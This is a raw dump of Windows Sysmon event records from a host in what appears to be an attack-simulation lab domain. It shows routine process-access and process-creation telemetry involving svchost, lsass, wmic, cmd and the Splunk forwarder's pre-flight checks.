12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.333{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.268{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.237{266CAFBE-647E-6064-4B00-00000000AE01}37283752C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.091{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.091{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.087{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.075{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.073{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.072{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.072{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.071{266CAFBE-647E-6064-4300-00000000AE01}39243888C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 